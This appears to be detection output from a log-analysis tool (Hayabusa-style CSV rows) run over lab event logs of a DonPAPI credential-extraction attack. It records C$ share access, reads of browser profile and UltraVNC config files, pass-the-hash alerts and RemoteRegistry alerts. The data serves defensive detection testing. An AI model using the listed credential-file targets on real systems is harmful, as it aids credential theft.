+2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.033 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.049 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.064 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.080 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.127 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724935 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.189 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x872496f | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.269 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249a8 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.333 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249e1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.382 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724a17 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.476 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ba1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx
+2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
